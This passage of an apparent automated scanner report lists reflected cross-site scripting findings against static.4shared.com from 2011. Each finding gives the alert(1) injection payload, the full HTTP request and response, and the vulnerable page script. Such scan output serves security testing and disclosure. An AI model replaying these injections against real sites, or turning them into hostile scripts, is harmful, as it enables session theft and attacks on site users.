var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr7289a"-alert(1)-"da5431a7505/engine.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.115. http://static.4shared.com/dwr/engine.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/engine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbe7e'-alert(1)-'089d88b0ab2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwrfbe7e'-alert(1)-'089d88b0ab2/engine.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwrfbe7e'-alert(1)-'089d88b0ab2/engine.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5061C8CD73DC67073F8AD79AC60E3D80.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:47 GMT
Content-Length: 36149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/dwrfbe7e'-alert(1)-'089d88b0ab2/engine.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fu
...[SNIP]...

1.116. http://static.4shared.com/dwr/engine.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/engine.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dbcd"-alert(1)-"68c48b7d60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/2dbcd"-alert(1)-"68c48b7d60f?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DAAB3CF86EC0E243EFBD3B3398498731.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:49 GMT
Content-Length: 36115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/2dbcd"-alert(1)-"68c48b7d60f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.117. http://static.4shared.com/dwr/engine.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/engine.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ff89'-alert(1)-'ee1ba20dd61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/5ff89'-alert(1)-'ee1ba20dd61?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7205DC3D2994A1E3FE59856B6C4022B6.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:50 GMT
Content-Length: 36104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/dwr/5ff89'-alert(1)-'ee1ba20dd61',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.118. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b41d'-alert(1)-'fa8ca18347e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr9b41d'-alert(1)-'fa8ca18347e/interface/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwr9b41d'-alert(1)-'fa8ca18347e/interface/DirChecks.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C7972C46957DA3DAC6AB4B77B8CD5872.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:43 GMT
Content-Length: 36225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/dwr9b41d'-alert(1)-'fa8ca18347e/interface/DirChecks.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.119. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb97"-alert(1)-"81101aeb9ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7D64AD06194FD8CC93BD6BE654E5F064.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:42 GMT
Content-Length: 36225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

1.120. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e13d9'-alert(1)-'ae3227651b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interfacee13d9'-alert(1)-'ae3227651b7/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=167FD861097995740D3AA1F9F10DD71B.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:47 GMT
Content-Length: 36225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
oginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/dwr/interfacee13d9'-alert(1)-'ae3227651b7/DirChecks.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.121. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8499f"-alert(1)-"105b75277af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0465F93AE68A9307DB1F71E541F1FD88.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:46 GMT
Content-Length: 36214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.122. http://static.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf63"-alert(1)-"b00ceae7821 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4bf63"-alert(1)-"b00ceae7821 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __qca=P0-1133200866-1297862349616; search.view2=ls; JSESSIONID=1C17362F5BC92C5103B471FB8A66CDEC.dc293; __utmz=210074320.1298730611.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=210074320.1172937508.1297862350.1298497029.1298730611.3; __utmc=210074320; __utmb=210074320.1.10.1298730611; WWW_JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /favicon.ico4bf63"-alert(1)-"b00ceae7821
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A859F2580962A175B0E84ECA0DA5E46.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:30:33 GMT
Content-Length: 36150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/favicon.ico4bf63"-alert(1)-"b00ceae7821";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.123. http://static.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75ee4'-alert(1)-'ab2eb10c6d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico75ee4'-alert(1)-'ab2eb10c6d9 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __qca=P0-1133200866-1297862349616; search.view2=ls; JSESSIONID=1C17362F5BC92C5103B471FB8A66CDEC.dc293; __utmz=210074320.1298730611.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=210074320.1172937508.1297862350.1298497029.1298730611.3; __utmc=210074320; __utmb=210074320.1.10.1298730611; WWW_JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /favicon.ico75ee4'-alert(1)-'ab2eb10c6d9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=90054AFA7F699D96CDC74CE89A3D9293.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:30:34 GMT
Content-Length: 36150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/favicon.ico75ee4'-alert(1)-'ab2eb10c6d9',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.124. http://static.4shared.com/images/all1.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/all1.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16830'-alert(1)-'f08d3641cf5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images16830'-alert(1)-'f08d3641cf5/all1.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images16830'-alert(1)-'f08d3641cf5/all1.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BA8432A4A273FCAE6343457EC6801930.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:18 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images16830'-alert(1)-'f08d3641cf5/all1.png',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.125. http://static.4shared.com/images/all1.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/all1.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14de5"-alert(1)-"e4251d0b96d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images14de5"-alert(1)-"e4251d0b96d/all1.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images14de5"-alert(1)-"e4251d0b96d/all1.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B90B8CFFF92E414656949961A77BB453.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images14de5"-alert(1)-"e4251d0b96d/all1.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.126. http://static.4shared.com/images/all1.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/all1.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e185c'-alert(1)-'8006197f945 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/all1.pnge185c'-alert(1)-'8006197f945 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/all1.pnge185c'-alert(1)-'8006197f945
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B58CB3575ACB7356EDD04F5D74767A4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:24 GMT
Content-Length: 36178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/all1.pnge185c'-alert(1)-'8006197f945',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.127. http://static.4shared.com/images/all1.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/all1.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d50a"-alert(1)-"fe06872aee9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/all1.png6d50a"-alert(1)-"fe06872aee9 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/all1.png6d50a"-alert(1)-"fe06872aee9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F60A78D00D8D111A732C99A0F05AEB4D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/all1.png6d50a"-alert(1)-"fe06872aee9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.128. http://static.4shared.com/images/bg14.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/bg14.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd184'-alert(1)-'5d86e1f6009 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagescd184'-alert(1)-'5d86e1f6009/bg14.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagescd184'-alert(1)-'5d86e1f6009/bg14.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C88CAE940A0E830797517167F760B614.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:39 GMT
Content-Length: 36178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/imagescd184'-alert(1)-'5d86e1f6009/bg14.png',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.129. http://static.4shared.com/images/bg14.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/bg14.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12272"-alert(1)-"abf7e4d3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images12272"-alert(1)-"abf7e4d3c4/bg14.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images12272"-alert(1)-"abf7e4d3c4/bg14.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=43D79AA9EFAA9A673546765B9249A7AC.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:38 GMT
Content-Length: 36173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images12272"-alert(1)-"abf7e4d3c4/bg14.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

